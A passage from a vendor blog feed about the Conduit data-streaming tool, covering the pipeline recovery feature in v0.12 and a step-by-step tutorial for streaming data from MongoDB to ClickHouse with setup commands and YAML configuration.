&lt;p&gt;Whether you&apos;re looking to deploy individual instances with Conduit Operator or scale enterprise-wide with the Conduit Platform, Meroxa provides the tools and flexibility to manage your data pipelines efficiently.&lt;/p&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;The &lt;strong&gt;Conduit Operator&lt;/strong&gt; simplifies data pipeline management in Kubernetes environments, enabling you to easily manage data streams. For businesses looking to scale, integrate complex data systems, and optimize their operations, the &lt;strong&gt;Conduit Platform&lt;/strong&gt; provides a powerful low-code solution that expands on the capabilities of the Conduit Operator.&lt;/p&gt;
&lt;p&gt;Get started with Conduit Operator on &lt;a href=&quot;https://github.com/ConduitIO/conduit-operator&quot;&gt;GitHub&lt;/a&gt; and take your data pipeline management to the next level with the Conduit Platform for a low-code, enterprise-ready experience. Also check out our &lt;a href=&quot;https://conduit.io/docs/scaling/conduit-operator&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Looking for managed platform solutions? Check out our Conduit Platform by &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;requesting a demo&lt;/a&gt;. Let&apos;s build the future of data integration together!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unlocking Resilience: Conduit v0.12.0 Introduces Pipeline Recovery]]></title><description><![CDATA[The Conduit team has just released Conduit v0.12, and we're gearing up for the launch of Conduit v1 with a focus on making pipelines more resilient. One key feature of this release is pipeline recovery, designed to automatically restart pipelines that experience temporary errors like network interruptions or service downtime.

With configurable backoff settings, Conduit can efficiently handle retries, reducing the impact of transient issues. Learn more about this feature and how it ensures your pipelines are always up and running.]]></description><link>https://meroxa.com/blog/unlocking-resilience-conduit-v0120-introduces-pipeline-recovery</link><guid isPermaLink="false">https://meroxa.com/blog/unlocking-resilience-conduit-v0120-introduces-pipeline-recovery</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Fri, 11 Oct 2024 16:20:16 GMT</pubDate><content:encoded>&lt;p&gt;Hey, data streaming fans! The Conduit team is happy to inform you that Conduit v0.12 has &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.12.0&quot;&gt;just been released&lt;/a&gt;! As we prepare for the launch of Conduit v1, one of the key things we’ve been focusing on is how to make our pipelines more resilient. We believe this is a crucial step in preparing for the 1.0 major release.&lt;/p&gt;
&lt;p&gt;Many in the data streaming world know that there is no such thing as a pipeline that is &lt;em&gt;always running&lt;/em&gt;. Most pipeline errors are the result of temporary issues like network interruptions or services being unavailable for maintenance. The question then becomes how the pipeline handles such failures.&lt;/p&gt;
&lt;p&gt;In most cases, simply retrying is enough to get through transient errors efficiently. This can and should be done by connectors and processors. But what if they don’t have a proper backoff implementation? For Conduit users, this typically means they would need to wait for the connector or processor to be updated. That’s where Conduit’s pipeline recovery comes in.&lt;/p&gt;
&lt;h2&gt;How does it work?&lt;/h2&gt;
&lt;p&gt;If a pipeline experiences an error, such as a source connector failing to read a record or a processor failing to process one, the pipeline is stopped and its status is set to &lt;code class=&quot;language-text&quot;&gt;degraded&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Pipeline recovery in Conduit v0.12 by default will restart the pipeline that experienced the error. However, you can always &lt;a href=&quot;https://conduit.io/docs/features/pipeline-recovery/#how-to-disable-pipeline-recovery&quot;&gt;disable this feature if needed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Conduit restarts a previously failed pipeline using a backoff algorithm for which the parameters can be tuned with &lt;a href=&quot;https://conduit.io/docs/features/configuration&quot;&gt;CLI flags, environment variables, or a global configuration file&lt;/a&gt;. We’ll explain this behavior through the following scenario, assuming that the default backoff settings are used.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A PostgreSQL-to-MongoDB pipeline starts.&lt;/li&gt;
&lt;li&gt;After some time, the source PostgreSQL instance becomes unavailable. This results in an error that causes the pipeline to stop.&lt;/li&gt;
&lt;li&gt;Conduit waits for 1 second and restarts the pipeline.&lt;/li&gt;
&lt;li&gt;The pipeline fails again because the source PostgreSQL instance is still unavailable. The waiting is multiplied by 2, so Conduit waits for 2 seconds.&lt;/li&gt;
&lt;li&gt;Step 4 is repeated until the pipeline is running. Maximum waiting time is 10 minutes.&lt;/li&gt;
&lt;/ol&gt;
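&lt;p&gt;As an illustration, tuning these backoff parameters in the global configuration file might look like the snippet below. The exact key names are documented in the configuration reference linked above; the values shown are illustrative, not the defaults:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;# conduit.yaml -- illustrative backoff settings for pipeline recovery
pipelines:
  error-recovery:
    min-delay: 1s       # wait before the first restart
    max-delay: 10m      # cap on the backoff wait
    backoff-factor: 2   # the wait is multiplied by this after each failure
    max-retries: -1     # -1 retries indefinitely&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;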
&lt;p&gt;Here&apos;s a diagram of the algorithm:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/pipe-recovery.png&quot; alt=&quot;pipe-recovery.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;By default, there’s no limit on the number of retries. If the retries are &lt;a href=&quot;https://conduit.io/docs/features/pipeline-recovery#pipelineserror-recoverymax-retries&quot;&gt;limited&lt;/a&gt;, then Conduit will also make sure that the recovery attempts are reset smartly so that:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Recovery attempts are not tracked indefinitely. That would cause, for example, a pipeline to transition into the &lt;code class=&quot;language-text&quot;&gt;degraded&lt;/code&gt; state because it failed 3 times in the past 12 months.&lt;/li&gt;
&lt;li&gt;A pipeline is not being restarted indefinitely because it manages to start just before the maximum number of retries, and after some time, it fails again.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The documentation for pipeline recovery can be found &lt;a href=&quot;https://conduit.io/docs/features/pipeline-recovery&quot;&gt;here&lt;/a&gt;. As always, the Conduit team is happy to hear any feedback you might have about this feature! You can find us on our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; or you can start a new &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streaming Data from MongoDB to ClickHouse using Conduit Platform]]></title><description><![CDATA[Learn how to stream data from MongoDB to ClickHouse in real-time using Meroxa Conduit. This step-by-step guide simplifies data integration for scalable analytics and real-time reporting, empowering you to unlock insights faster.]]></description><link>https://meroxa.com/blog/streaming-data-from-mongodb-to-clickhouse-using-conduit-platform</link><guid isPermaLink="false">https://meroxa.com/blog/streaming-data-from-mongodb-to-clickhouse-using-conduit-platform</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Mon, 23 Sep 2024 18:04:46 GMT</pubDate><content:encoded>&lt;p&gt;The new world of data is requiring the ability to move data quickly and efficiently across systems and, is vital for organizations seeking to gain real-time insights. Streaming data from sources like MongoDB to powerful analytics databases like ClickHouse can unlock opportunities for faster decision-making and more responsive applications. In this blog, we will walk through the technical process of setting up a real-time data streaming pipeline from MongoDB to ClickHouse using &lt;strong&gt;Conduit&lt;/strong&gt;, an open-source data integration tool designed for high-performance streaming.&lt;/p&gt;
&lt;p&gt;This guide builds on our previous demonstration of moving data from PostgreSQL to ClickHouse, and we’ll now shift our focus to MongoDB as the source of our real-time data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why Stream Data from MongoDB to ClickHouse?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;MongoDB is a popular NoSQL database well-suited for managing large volumes of flexible, unstructured data. However, as applications grow and the need for real-time analytics arises, MongoDB may not be optimized for complex analytical queries at scale. This is where &lt;strong&gt;ClickHouse&lt;/strong&gt; comes in—known for its lightning-fast analytical capabilities, it is perfect for handling high-velocity, complex queries over large datasets.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;By streaming data from MongoDB to ClickHouse&lt;/strong&gt;, organizations can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perform real-time analytics on transactional data.&lt;/li&gt;
&lt;li&gt;Benefit from ClickHouse’s OLAP (Online Analytical Processing) strengths.&lt;/li&gt;
&lt;li&gt;Visualize large data sets with minimal latency using tools like Grafana.&lt;/li&gt;
&lt;li&gt;Ensure scalability and maintain performance as the system grows.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Setting Up the Pipeline: Streaming from MongoDB to ClickHouse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Now, let’s dive into the technical steps required to set up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 1: Installing Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;First, you’ll need to install Conduit, which acts as the backbone of our data pipeline. The setup process is straightforward:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Head to the &lt;a href=&quot;https://conduit.io/docs/getting-started/installing-and-running&quot;&gt;Conduit installation documentation&lt;/a&gt; to download the binary for your platform.&lt;/li&gt;
&lt;li&gt;Follow the instructions to install and run Conduit on your system.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once installed, you should have the conduit command available in your terminal. This will be used to manage and run our data pipeline.&lt;/p&gt;
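&lt;p&gt;A quick way to verify the installation is to start Conduit with its default settings; by default it serves its UI and HTTP API on port 8080:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;# Start Conduit with default settings, then open http://localhost:8080
./conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;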
&lt;p&gt;&lt;strong&gt;Step 2: Setting Up MongoDB and ClickHouse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MongoDB Configuration&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;If you haven’t already, install MongoDB:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;brew tap mongodb/brew
brew install mongodb-community@5.0
brew services start mongodb/brew/mongodb-community&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, create a user and a database collection in MongoDB:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;mongo
use admin
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createUser&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token literal-property property&quot;&gt;user&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_USER&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token literal-property property&quot;&gt;pwd&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_PASS&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token literal-property property&quot;&gt;roles&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;role&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;readWrite&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;db&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;meroxa&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

use meroxa
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createCollection&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, add some sample data that you want to see streamed over to ClickHouse:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;users&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;insertOne&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Alice&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;alice@example.com&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;users&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;insertOne&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Bob&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;bob@example.com&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;users&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;insertOne&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Charlie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;charlie@example.com&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Setting Up ClickHouse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For ClickHouse, you can use the following commands to set up the required table. This ensures that ClickHouse has the correct schema to receive the streamed data from MongoDB:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;curl &lt;span class=&quot;token operator&quot;&gt;--&lt;/span&gt;user &lt;span class=&quot;token string&quot;&gt;&apos;USERNAME:PASSWORD&apos;&lt;/span&gt; \
  &lt;span class=&quot;token operator&quot;&gt;--&lt;/span&gt;data&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;binary &apos;&lt;span class=&quot;token constant&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;TABLE&lt;/span&gt; meroxa&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;users&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
      _id String&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      name String&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      email String
  &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;ENGINE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;MergeTree&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token constant&quot;&gt;ORDER&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;BY&lt;/span&gt; _id&apos; \
  $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CLICKHOUSE_URL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
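Conceptually, each MongoDB document is flattened into a row matching this schema: the ObjectId becomes the `_id String` column, and the scalar fields fill the remaining columns. A minimal Python sketch of that mapping (a hypothetical helper for illustration, not Conduit code):

```python
def doc_to_row(doc):
    # Render the document id as a string to match the `_id String` column,
    # then pull out the scalar fields in column order (_id, name, email).
    return (str(doc["_id"]), doc["name"], doc["email"])

# Example: one of the sample documents inserted earlier.
row = doc_to_row({"_id": "64f0c1a2b3", "name": "Alice", "email": "alice@example.com"})
```

This is also why the table declares `_id` as `String` rather than a numeric type: MongoDB ObjectIds are hex strings, not integers.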
&lt;p&gt;Note: Once you have a ClickHouse instance (or a trial from the ClickHouse website), use the Connect button to find the username, password, and ClickHouse URL needed to make API calls to your instance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 3: Installing the Required Connectors&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Conduit uses connectors to interface with data sources and sinks. In our case, we’ll use the &lt;strong&gt;MongoDB source connector&lt;/strong&gt; and the &lt;strong&gt;ClickHouse destination connector&lt;/strong&gt;.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Download the Connectors&lt;/strong&gt;: Clone the connectors from the official GitHub repositories:&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-mongo&quot;&gt;MongoDB Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-clickhouse&quot;&gt;ClickHouse Connector&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Build the Connectors&lt;/strong&gt;: After cloning the repositories, navigate into each directory and run &lt;code class=&quot;language-text&quot;&gt;make build&lt;/code&gt; to build the connectors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Move the Connectors to the Project Directory&lt;/strong&gt;: Place the compiled connectors into the &lt;code class=&quot;language-text&quot;&gt;connectors/&lt;/code&gt; folder in your project:&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;├── connectors
│   ├── conduit&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;clickhouse
│   └── conduit&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;mongo&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Step 4: Define the Data Pipeline in YAML&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here is a YAML configuration file, &lt;code class=&quot;language-text&quot;&gt;mongo-to-clickhouse.yaml&lt;/code&gt;, that defines the pipeline for moving data from MongoDB to ClickHouse:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token literal-property property&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token literal-property property&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; mongo&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;to&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;ch
    &lt;span class=&quot;token literal-property property&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token literal-property property&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;
      This pipeline showcases real&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;time data streaming from MongoDB to Clickhouse&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
    &lt;span class=&quot;token literal-property property&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;SOURCE&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; mongo&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;mongo
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;uri&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mongodb://MONGO_USER:MONGO_PASS@MONGO_URL:PORT/MONGO_DB?authSource=admin&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;db&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_DB&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;collection&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;
          auth&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;username&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_USER&quot;&lt;/span&gt;
          auth&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;password&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_PASS&quot;&lt;/span&gt;
          auth&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;mechanism&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;SCRAM-SHA-256&quot;&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;DESTINATION&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; clickhouse&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;sink
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;clickhouse
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://USERNAME:PASSWORD@CLICKHOUSE_URL?secure=true&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;keyColumns&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;_id&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
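The source's `uri` setting is a standard MongoDB connection string. If you assemble it programmatically, remember to percent-encode the credentials; a small sketch (the helper name here is ours, not part of Conduit):

```python
from urllib.parse import quote_plus

def mongo_uri(user, password, host, port, db, auth_source="admin"):
    # Percent-encode credentials so characters like '@' or ':' don't break the URI.
    return (f"mongodb://{quote_plus(user)}:{quote_plus(password)}"
            f"@{host}:{port}/{db}?authSource={auth_source}")

uri = mongo_uri("MONGO_USER", "MONGO_PASS", "localhost", 27017, "meroxa")
```

`authSource=admin` matches the earlier `db.createUser` call, which created the user in the `admin` database.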
&lt;p&gt;This pipeline is configured to move data from the users collection in MongoDB to the users table in ClickHouse in real time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 5: Running the Pipeline&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;With everything set up, you can now run the pipeline with a single command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the pipeline is running, any changes made to the users collection in MongoDB will be streamed in real time to the users table in ClickHouse.&lt;/p&gt;
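Conceptually, the sink applies a stream of change events to the target table: inserts and updates upsert by key, deletes remove the key. This toy Python sketch mimics that behavior (the event shape is invented for illustration and is not Conduit's actual record format):

```python
def apply_event(table, event):
    # Upsert on insert/update; drop the key on delete (ignore if absent).
    op, doc = event["op"], event["doc"]
    key = str(doc["_id"])
    if op in ("insert", "update"):
        table[key] = doc
    elif op == "delete":
        table.pop(key, None)
    return table

table = {}
apply_event(table, {"op": "insert", "doc": {"_id": 1, "name": "Alice"}})
apply_event(table, {"op": "update", "doc": {"_id": 1, "name": "Alicia"}})
apply_event(table, {"op": "delete", "doc": {"_id": 1}})
```

The real pipeline does the same thing continuously, which is why a row you edit in MongoDB shows up changed in ClickHouse moments later.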
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/pipelines.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
